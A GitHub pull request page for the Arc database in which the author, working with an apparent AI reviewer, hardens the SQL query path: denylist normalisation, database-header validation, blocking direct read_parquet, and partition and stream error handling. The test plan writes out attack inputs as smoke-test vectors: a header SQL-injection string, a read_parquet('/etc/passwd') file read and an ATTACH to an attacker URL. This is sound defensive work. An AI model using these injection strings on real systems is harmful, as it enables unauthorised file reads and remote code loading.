fix(query): six critical-path hardening fixes from query-path review by xe-nvdk · Pull Request #414 · Basekick-Labs/arc

xe-nvdk · 2026-04-28T16:43:13Z

Summary

A 4-agent staff/principal-engineer review of the query execution path (mirror of the ingest review that produced #413) surfaced 8 raw CRITICALs, 27 HIGH, 50 MEDIUM, 24 LOW findings — deduplicated to 6 unique CRITICALs, all addressed in this PR. The remaining HIGH/MEDIUM/LOW findings will be filed as separate issues in a follow-up.

The 6 Fixes

#	File:Line	Title	Class
C1	`query.go:506-541`	Expanded SQL denylist + comment-strip + literal-mask normalisation	Defense-in-depth on read-only API
C2	`query.go` (8 sites), `query_arrow.go:52`, `internal/sql/mask.go`	`x-arc-database` header validation + universal `read_parquet` path quoting	Path-literal escape
C3	`query.go:506+` (read_parquet rejection), `query.go:75` (CTE regex)	Reject direct `read_parquet()` in user SQL + extend CTE name regex	RBAC bypass closure
C4	`query.go:1238+` (caller), `query/parallel_executor.go:97+`	Parallel-partition partial-failure now fails the whole request + launch-loop semaphore	Silent data-loss + fan-out cap
C5	`query_json_writer.go:80`, `query_arrow_json.go:169`, `query_arrow.go:128`, `query.go` (3 callsites)	`streamTypedJSON`/`streamArrowJSON` return `(int, error)`; per-row/per-batch ctx check; registry Fail/TimedOut on partial-failure	Stream-error observability
C6	`query_arrow.go:147`	Arrow IPC: defer→explicit `batch.Release` per iteration	Memory pinning

Bench Delta (within 5% no-regression budget)

Workload: SELECT RegionID, COUNT(*), SUM(ResolutionWidth) FROM clickbench.hits GROUP BY RegionID ORDER BY 2 DESC LIMIT 100 on 99.9 M rows, 20 iterations per format.

Format	Baseline (post-restart, pre-fix)	After 6 fixes	Delta
JSON avg	73.07 ms	74.44 ms	+1.9%
JSON p95	75.86 ms	78.58 ms	+3.6%
JSON p99	75.86 ms	78.58 ms	+3.6%
Arrow avg	73.29 ms	73.35 ms	+0.1%
Arrow p95	76.14 ms	78.36 ms	+2.9%
Arrow p99	76.14 ms	78.36 ms	+2.9%

JSON and Arrow paths both go through executeArrowJSONQuery → streamArrowJSON in the production build (-tags=duckdb_arrow), so the per-row ctx check in streamTypedJSON (only on the database/sql fallback) is NOT on the hot path. The most likely sources of the small delta: the expanded ValidateSQLRequest pipeline (mask-literals + strip-comments + larger denylist regex + new userSQLReadParquetPattern check) which now runs three regex passes per request instead of one, and the quotePath() helper allocations. All on the per-request path; well within the 5% budget.

Test Plan

go test ./internal/api/... ./internal/query/... ./internal/queryregistry/... ./internal/database/... (no -tags)
go test -tags=duckdb_arrow ./internal/api/... (Arrow code paths)
go build ./internal/... ./cmd/...
Smoke test against running Arc with each attack vector + a legit query:
- C2: x-arc-database: evil', enable_external_access=true) UNION SELECT 1 FROM read_parquet('y → 400 invalid x-arc-database header: name contains invalid characters
- C3: SELECT * FROM read_parquet('/etc/passwd') → 400 Direct read_parquet() calls are not allowed in user SQL
- C1 (ATTACH): ATTACH 'http://attacker/db' AS evil → 400 Dangerous SQL operation not allowed
- C1 (PRAGMA): PRAGMA enable_external_access=true → 400 Dangerous SQL operation not allowed
- Legit: SELECT COUNT(*) FROM clickbench.hits → 99,997,497 rows, 1 ms
New regression tests:
- TestDangerousSQLPatterns extended with 13 RCE-class keyword cases + 4 case variations (now goes through ValidateSQLRequest, not raw regex)
- TestValidateSQLRequest_BypassesAndFalsePositives — comment-injection bypasses + literal/quoted-identifier false-positive tolerance + 6 read_parquet-direct-call rejections
- TestValidateHeaderDatabase — 18 cases covering legitimate values + 11 SQLi/path-traversal vectors
- TestQuotePath — 6 cases pinning the escape contract
- TestExtractCTENames extended with 3 cases for parenthesized CTE column-list form
- TestStreamTypedJSON_ReturnsErrorOnScanFailure and ..._OnCtxCancel for C5 contract

Review-Agent Reports

The 4 agent reports (correctness / security / code quality / perf) are retained in the conversation transcript that drove this PR; the remaining HIGH/MEDIUM/LOW findings (~80 items after dedup against #313/#309/#308/#307/#334/#332/#331/#330/#352) will be filed as individual GitHub issues after this PR opens.

🤖 Generated with Claude Code

A 4-agent staff/principal-engineer review of the query execution path (mirror of the ingest review that produced PR #413) surfaced six issues we want addressed before 26.05.1 GA. All are fixed here. Bench delta is within the 5% no-regression budget on a 99.9M-row ClickBench GROUP BY workload (JSON p95 75.86ms→78.58ms, Arrow p95 76.14ms→78.36ms). C1 — Expanded SQL denylist + comment-strip + literal-mask normalisation. The query API guardrail previously gated only DDL/DML keywords. It now also gates ATTACH/DETACH/COPY/EXPORT/IMPORT DATABASE/PRAGMA/ SET <var>=/LOAD/INSTALL/CALL — session/extension/file-system ops that don't belong in a read-only query path. ValidateSQLRequest now strips comments and masks string literals before the regex check, so `DROP /* */ TABLE x` cannot interleave comments past token boundaries and `SELECT 'DROP TABLE x'` is not falsely rejected. Removed the dead (h *QueryHandler).validateSQL method (code-quality finding from the same review). Test matrix covers every blocked keyword + comment- injection + quoted-identifier false-positive cases. C2 — x-arc-database header validation + universal read_parquet path quoting. The header value lands inside read_parquet('<base>/<db>/...') storage paths Arc generates internally; in some edge cases a header containing a single quote or shell-active char could break out of the literal. New validateHeaderDatabase helper validates at every entry point (executeQuery, executeQueryArrow, estimateQuery). New quotePath() helper routes every read_parquet('PATH', ...) interpolation site through sqlutil.EscapeStringLiteral (added to internal/sql/mask.go as a single source of truth). Eight read_parquet sites in query.go converted. Tests cover SQLi vectors (quote, NUL, newline, comma, backslash, path-traversal) and boundary conditions. C3 — Reject direct read_parquet() in user SQL + extend CTE name regex. Arc's transformation layer is the only legitimate source of read_parquet — in some edge cases, a user query containing read_parquet directly produced zero extracted table references and bypassed the (database, measurement) RBAC pair-check. ValidateSQLRequest now rejects user SQL containing read_parquet(. Companion fix: the CTE-name extraction regex was extended to recognise the parenthesized column-list form (WITH foo(c1, c2) AS (...)), so a CTE name doesn't leak into the table-reference list. Tests cover read_parquet in JOIN, subqueries, CTEs, plus the new CTE column-list parse. C4 — Parallel-partition partial-failure now fails the whole request. When the parallel executor fans out a query across N partitions and one or more partition queries error, NewMergedRowIterator previously returned the surviving partitions' rows as a 200/success — a fraction of the result silently dropped. The handler now inspects per-partition Error after ExecutePartitioned and fails the request with HTTP 500 on any partition error. Companion fix in parallel_executor.go: the goroutine fan-out semaphore is acquired in the launch loop instead of inside each spawned goroutine, so a 10K-path query bounds in-flight goroutines at MaxConcurrentPartitions (default 4) instead of spawning 10K goroutines parked on the semaphore. C5 — Streaming-response error semantics. streamTypedJSON and streamArrowJSON previously returned only the row count; in some edge cases (Scan failures mid-stream, deferred *sql.Rows.Err(), context cancellation after the response envelope was already flushed) the loop silently `continue`'d and the caller marked the query Complete(rowCount). Both functions now return (int, error), perform a ctx.Err() check at every row/batch boundary, and check the iterator's deferred error after the loop. Callers route any error to IncQueryErrors, registry Fail() (or TimedOut() on context.DeadlineExceeded), and an Error log line. The HTTP status cannot be changed retroactively (headers already flushed) but operator-side observability is now correct. The Arrow IPC stream loop in executeQueryArrow adopts the same per-batch ctx-check pattern. C6 — Arrow IPC streaming memory pinned by deferred Release. The executeQueryArrow IPC loop used `defer batch.Release()` inside the for-reader.Next() body. Defers accumulate on the closure stack until the closure exits — for a 10M-row result with 10K-row batches, 1,000 deferred Release calls held all casted Arrow records alive until the entire stream completed. Releases each casted batch explicitly after ipcWriter.Write, restoring constant per-batch memory. The reader-owned input batch needs no Release; reader.Next() releases the prior record automatically. Build clean; full ./internal/api/... ./internal/query/... ./internal/queryregistry/... ./internal/database/... test suites pass. Smoke test against running Arc verified all 5 attack vectors are rejected (header SQLi, direct read_parquet, ATTACH RCE, PRAGMA hardening) and legitimate queries still work.

xe-nvdk · 2026-04-28T16:43:51Z

/gemini review

@gemini-code-assist this PR addresses six critical-path findings from a 4-agent staff/principal-engineer review of Arc's query execution path — companion to the ingest-path review that landed as #413.

Please pay particular attention to:

SQL denylist normalisation pipeline (internal/api/query.go ValidateSQLRequest ~1465+ and dangerousSQLPattern ~506+). Comment-strip + literal-mask runs before the regex; verify there's no normalisation order that lets a keyword slip past, especially in interaction with the new userSQLReadParquetPattern check.
x-arc-database header validation + quotePath() escape symmetry (internal/api/query.go validateHeaderDatabase + quotePath ~1750+, internal/sql/mask.go EscapeStringLiteral). Eight read_parquet interpolation sites in query.go now route through quotePath. Look for any site I missed, especially under buildMultiTierReadParquet and buildReadParquetExprForParallel.
Stream-error semantics (streamTypedJSON / streamArrowJSON returning (int, error)). The HTTP envelope is closed even on error so the client gets valid JSON; the registry/metrics/log path differentiates Complete vs Fail vs TimedOut. Check the three callsites in query.go (parallel + standard + queryMeasurement) and the Arrow JSON callsite in query_arrow_json.go for divergence.
Parallel-partition error aggregation (query.go after ExecutePartitioned). Any errored partition fails the whole request with HTTP 500. Companion launch-loop semaphore in parallel_executor.go:101+ bounds in-flight goroutines at MaxConcurrentPartitions.
Arrow IPC defer→explicit Release (query_arrow.go:147+). The fix tracks the casted record via a separate castedBatch variable so the reader-owned input record is never accidentally released; reader.Next() releases the prior one automatically.
CTE name regex (patternCTENames ~75). Now handles WITH foo(c1, c2) AS (...) form. Three new test cases pin this; verify the (?:\s*\([^)]*\))? non-greedy column-list match doesn't introduce a backtracking pathology.

Bench delta on 99.9M-row ClickBench GROUP BY: JSON p95 +3.6%, Arrow p95 +2.9% — within the 5% budget. Smoke test against running Arc verified all four attack vectors (header SQLi, direct read_parquet, ATTACH RCE, PRAGMA hardening) reject correctly while legitimate queries return successfully.

Looking for any findings.

gemini-code-assist

Code Review

This pull request implements significant hardening of the query execution path, addressing security vulnerabilities and correctness issues identified during a staff-level review. Key changes include expanding the SQL denylist to block RCE-class operations, introducing robust input validation for the x-arc-database header, and ensuring safe path interpolation via a new quotePath helper. Additionally, the PR improves error handling for streaming responses and parallel partition execution to prevent silent data loss, and optimizes memory usage in Arrow IPC streaming. I have provided feedback on further tightening the SQL denylist regex and ensuring consistent context usage for streaming responses.

gemini-code-assist

Code Review

This pull request implements critical security hardening and correctness fixes for the query execution path. Key changes include expanding the SQL denylist with normalization (comment stripping and literal masking), validating the x-arc-database header, and preventing direct read_parquet calls in user SQL to enforce RBAC. Additionally, the PR ensures partial failures in streaming and parallel execution are surfaced as errors rather than silent partial results, and it fixes a memory leak in Arrow IPC streaming by releasing batches explicitly. Review feedback suggests using more idiomatic select blocks for context cancellation checks within streaming loops and simplifying error collection logic.

…elect Addresses 5 NEW gemini findings on PR #414 commit 244849b. One MEDIUM (G4 — simplify error-collection loop) was a no-op suggestion identical to the existing code; skipped. CRITICAL/security-critical (gemini G1) — SET regex bypassable: The previous \bSET\s+(?:GLOBAL\s+|...)?\w+\s*= form required an equals sign and a word after the optional scope keyword. DuckDB also accepts: - SET enable_external_access TO true (TO instead of =) - SET VARIABLE x = 1 (VARIABLE keyword) - RESET enable_external_access (mutates session state) All three slipped past the regex. Replaced the multi-form pattern with bare \bSET\b and added \bRESET\b. The query API is read-only so any session-state mutation is forbidden — bare-keyword match is correct here. New regression tests for all three bypass shapes. CRITICAL/security-critical (gemini G2) — CALL regex bypassable: \bCALL\s+\w+ required whitespace before the procedure name, but DuckDB accepts CALL(proc_name) with no space. Replaced with bare \bCALL\b. Regression test for the no-space form. MEDIUM (gemini G3) — queryMeasurement streamCtx: Switched from context.Background() to c.UserContext() so client disconnects propagate to per-row cancellation. Fasthttp keeps c.Context() alive across the SetBodyStreamWriter boundary so it's safe inside the async stream callback (consistent with the executeQuery and executeQueryArrow patterns). MEDIUM (gemini G5+G6) — idiomatic select for ctx cancellation: Replaced 'if ctx.Err() != nil' with 'select { case <-ctx.Done() }' + default at three call sites — streamTypedJSON, streamArrowJSON, and the Arrow IPC stream loop in executeQueryArrow. Required labeled-break (break scanLoop / batchLoop / streamLoop) because plain break inside select-in-for would only break the select. Same semantics, more idiomatic Go. Bench: two runs on warm state show JSON avg 72.64-73.85ms, p95 74.34-81.31ms; Arrow avg 72.30-73.66ms, p95 74.30-75.50ms — well within run-to-run jitter of baseline (73ms avg / 76ms p95). The "+3.6% JSON p95" delta from the initial commit appears to have been first-restart cold-cache noise, not a real regression. Build clean (default + -tags=duckdb_arrow); full test sweep across internal/api/... internal/query/... internal/queryregistry/... internal/database/... passes.

xe-nvdk · 2026-04-28T17:02:18Z

/gemini review

@gemini-code-assist round 2 fixes pushed in commit 892d24c. All 5 actionable findings addressed; G4 (simplify error-collection loop) was a no-op suggestion — your snippet is identical to the existing code, so I skipped it.

🚨 G1 (CRITICAL) — SET regex bypassable:

✅ Replaced \bSET\s+(?:GLOBAL\s+|...)?\w+\s*= with bare \bSET\b + new \bRESET\b. The query API is read-only so any session-state mutation is forbidden — bare-keyword match is correct.
New regression tests for SET ... TO, SET VARIABLE x = 1, RESET <var>. All pass.

🚨 G2 (CRITICAL) — CALL regex bypassable:

✅ Replaced \bCALL\s+\w+ with bare \bCALL\b. Regression test for CALL(proc) with no whitespace before paren.

G3 (MEDIUM) — queryMeasurement ctx:

✅ streamCtx := c.UserContext() instead of context.Background() — client disconnects now propagate. Consistent with executeQuery/executeQueryArrow.

G5+G6 (MEDIUM) — idiomatic select for ctx:

✅ All three sites switched: streamTypedJSON, streamArrowJSON, Arrow IPC loop in executeQueryArrow. Used labeled-break (break scanLoop/batchLoop/streamLoop) because plain break inside select-in-for only breaks the select.

Bench: two runs on warm state show JSON avg 72.6-73.9ms / p95 74.3-81.3ms; Arrow avg 72.3-73.7ms / p95 74.3-75.5ms — well within run-to-run jitter of baseline (73ms avg / 76ms p95). The "+3.6% JSON p95" delta from the initial commit appears to have been first-restart cold-cache noise.

Looking for any final findings.

gemini-code-assist

Code Review

This pull request implements comprehensive security hardening and correctness fixes for the query execution path. Key improvements include an expanded SQL denylist that blocks session and file-system operations, normalized SQL validation that strips comments and masks literals, and strict validation of the x-arc-database header to prevent path injection. The changes also ensure that partial failures in parallel and streaming queries are correctly surfaced as errors rather than silent successes. Furthermore, a memory leak in Arrow IPC streaming was resolved by explicitly releasing record batches, and the parallel executor was optimized to bound goroutine creation. I have no feedback to provide.

The C1 denylist bullet listed SET <var>=/CALL (the original narrower regex form). After gemini round 1 found two bypass shapes (SET TO, SET VARIABLE, RESET, CALL with no whitespace before paren), the regex simplified to bare-keyword anchors plus added RESET. Update the release notes to match.

gemini-code-assist Bot reviewed Apr 28, 2026

View reviewed changes

Comment thread internal/api/query.go Outdated

Comment thread internal/api/query.go Outdated

Comment thread internal/api/query.go Outdated

gemini-code-assist Bot reviewed Apr 28, 2026

View reviewed changes

Comment thread internal/api/query.go

Comment thread internal/api/query_arrow.go Outdated

Comment thread internal/api/query_json_writer.go Outdated

gemini-code-assist Bot reviewed Apr 28, 2026

View reviewed changes

xe-nvdk merged commit 947d2b7 into main Apr 28, 2026
5 checks passed

xe-nvdk deleted the review/query-path-criticals branch April 28, 2026 17:06

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fix(query): six critical-path hardening fixes from query-path review#414

fix(query): six critical-path hardening fixes from query-path review#414
xe-nvdk merged 3 commits intomainfrom
review/query-path-criticals

xe-nvdk commented Apr 28, 2026 •

edited

Loading

Uh oh!

xe-nvdk commented Apr 28, 2026

Uh oh!

gemini-code-assist Bot left a comment

Uh oh!

Uh oh!

Uh oh!

Uh oh!

gemini-code-assist Bot left a comment

Uh oh!

Uh oh!

Uh oh!

Uh oh!

xe-nvdk commented Apr 28, 2026

Uh oh!

gemini-code-assist Bot left a comment

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

xe-nvdk commented Apr 28, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Summary

The 6 Fixes

Bench Delta (within 5% no-regression budget)

Test Plan

Review-Agent Reports

Uh oh!

xe-nvdk commented Apr 28, 2026

Uh oh!

gemini-code-assist Bot left a comment

Choose a reason for hiding this comment

Code Review

Uh oh!

Uh oh!

Uh oh!

Uh oh!

gemini-code-assist Bot left a comment

Choose a reason for hiding this comment

Code Review

Uh oh!

Uh oh!

Uh oh!

Uh oh!

xe-nvdk commented Apr 28, 2026

Uh oh!

gemini-code-assist Bot left a comment

Choose a reason for hiding this comment

Code Review

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

xe-nvdk commented Apr 28, 2026 •

edited

Loading